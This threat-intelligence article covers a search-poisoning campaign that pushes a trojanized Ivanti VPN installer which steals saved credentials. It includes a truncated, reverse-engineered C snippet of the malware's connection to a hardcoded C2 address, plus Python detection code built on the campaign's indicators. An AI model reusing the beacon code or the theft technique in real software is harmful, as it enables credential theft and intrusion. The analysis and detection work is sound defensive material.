An aggressive search engine optimization (SEO) poisoning campaign surfaced in early October 2025, preying on users searching for the legitimate Ivanti Pulse Secure VPN client.
Attackers registered lookalike domains such as ivanti-pulsesecure.com and ivanti-secure-access.org to host trojanized installers that appear official.
Unsuspecting victims who click on top-ranked search results are redirected to these malicious sites, where a signed MSI file is offered for download under the guise of Ivanti's Secure Access Client.
The trojanized installer carries a credential-stealing DLL designed to harvest saved VPN connection details and exfiltrate them to a C2 server hosted on Microsoft Azure infrastructure.
Example of Bing search results with a poisoned site (Source: Zscaler)
Zscaler researchers noted a sophisticated referrer-based content delivery tactic used by the phishing domains. When accessed directly in a browser, the sites display benign content with no download links, evading quick detection by analysts and security scanners.
Only users arriving via search engine referrals, notably from Bing, are shown the malicious download button; the pages use the HTTP Referer header to cloak their true intent.
Once downloaded, the MSI installer drops two malicious DLLs, dwmapi.dll and pulseextension.dll, signed by a legitimate certificate authority to further bypass security controls.
The threat actor's fake Ivanti Pulse Secure download site (Source: Zscaler)
These DLLs embed a series of routines to locate and parse the Ivanti connection store (connectionstore.dat), extracting saved URIs and credentials.
Examining the infection mechanism reveals how the malware establishes persistence and stealth. Upon execution, the trojanized DLL initiates a network handshake with a hardcoded IP address in the Azure range (4.239.95.1) on port 8080.
The following C code snippet illustrates the socket setup and data exchange routine:
#include <winsock2.h>
#include <ws2tcpip.h>

WSADATA wsa;
WSAStartup(MAKEWORD(2, 2), &wsa);
int sock = socket(AF_INET, SOCK_STREAM, 0);
struct sockaddr_in addr = {0};
addr.sin_family = AF_INET;
addr.sin_port = htons(8080);
// Hardcoded C2 address in the Azure range, port 8080
inet_pton(AF_INET, "4.239.95.1", &addr.sin_addr);
connect(sock, (struct sockaddr*)&addr, sizeof(addr));
// Receive 48 bytes from the C2 server
char buf[0x30];
recv(sock, buf, 0x30, 0);
// XOR deobfuscation (the loop body is truncated in the published snippet)
for(int i=0;i
Reverse-engineered code showing the network communication logic (Source: Zscaler)
After the initial handshake and XOR-based deobfuscation routine, the malware transmits the stolen VPN credentials in an HTTP POST request to the path /incomeshit, a colloquial label for exfiltration channels.
Because the IP resides within Microsoft Azure's range, security teams may overlook these connections as benign cloud traffic.
By masquerading as trusted software and incorporating advanced evasion techniques, this campaign demonstrates the effectiveness of search engine poisoning as an initial access vector.
Organizations should validate Ivanti installer checksums, monitor outbound connections to unfamiliar Azure IPs on port 8080, and educate users on verifying official download sources.
Continuous threat hunting for referrer-based anomalies remains essential to thwarting these stealthy attacks.
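As an added illustration of the hunting guidance above (this is example code, not from the article or from Zscaler), the script below scans proxy log lines for the indicators the article names: the lookalike domains, an MSI download reached only through a search engine referral, the 4.239.95.1:8080 beacon, and the POST to /incomeshit. The log layout and the sample lines are constructed for the example and do not correspond to any real product format.

```python
import re
# Indicators quoted in the article (from Zscaler's report); everything else here is constructed.
C2_IP = "4.239.95.1"
C2_PORT = 8080
EXFIL_PATH = "/incomeshit"
LOOKALIKE_DOMAINS = {"ivanti-pulsesecure.com", "ivanti-secure-access.org"}
SEARCH_REFERRERS = ("bing.com", "google.com")

# Hypothetical proxy log layout: <ts> <src_ip> <dst_ip>:<dst_port> <method> <host> <path> referer=<ref>
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\S+) (?P<dst>[\d.]+):(?P<port>\d+) "
    r"(?P<method>[A-Z]+) (?P<host>\S+) (?P<path>\S+) referer=(?P<ref>\S+)$"
)

def classify(line):
    """Return the set of indicator tags that a single log line matches."""
    m = LOG_RE.match(line)
    if not m:
        return set()          # unparsable lines are skipped, never treated as hits
    f = m.groupdict()
    tags = set()
    if f["dst"] == C2_IP and int(f["port"]) == C2_PORT:
        tags.add("c2-ip-port")                      # beacon to the hardcoded Azure address
    if f["method"] == "POST" and f["path"] == EXFIL_PATH:
        tags.add("exfil-path")                      # credential upload path
    if f["host"].lower() in LOOKALIKE_DOMAINS:
        tags.add("lookalike-domain")
        # MSI fetched from a lookalike domain via a search-engine referral: the cloaking pattern
        if f["path"].lower().endswith(".msi") and any(s in f["ref"].lower() for s in SEARCH_REFERRERS):
            tags.add("search-referred-msi")
    return tags

def scan(log_text):
    """Map 1-based line numbers to their tags, keeping only lines with at least one hit."""
    hits = {}
    for n, line in enumerate(log_text.splitlines(), 1):
        tags = classify(line)
        if tags:
            hits[n] = tags
    return hits

# Constructed sample log: lines 1-2 are benign, lines 3-5 mirror the reported infection chain.
SAMPLE_LOG = """\
2025-10-03T09:14:02Z 10.0.5.17 13.107.42.14:443 GET www.microsoft.com /en-us/ referer=-
2025-10-03T09:14:40Z 10.0.5.17 20.190.160.5:443 GET portal.azure.com / referer=-
2025-10-03T09:15:11Z 10.0.5.17 198.51.100.20:443 GET ivanti-pulsesecure.com /download/PulseSecure.msi referer=https://www.bing.com/search?q=ivanti+pulse+secure
2025-10-03T09:16:30Z 10.0.5.17 4.239.95.1:8080 CONNECT 4.239.95.1 / referer=-
2025-10-03T09:16:31Z 10.0.5.17 4.239.95.1:8080 POST 4.239.95.1 /incomeshit referer=-"""
```

Running `scan(SAMPLE_LOG)` flags only lines 3 to 5; the ordinary Azure portal session on line 2 produces no hit, which is the distinction the article's advice about port 8080 traffic relies on.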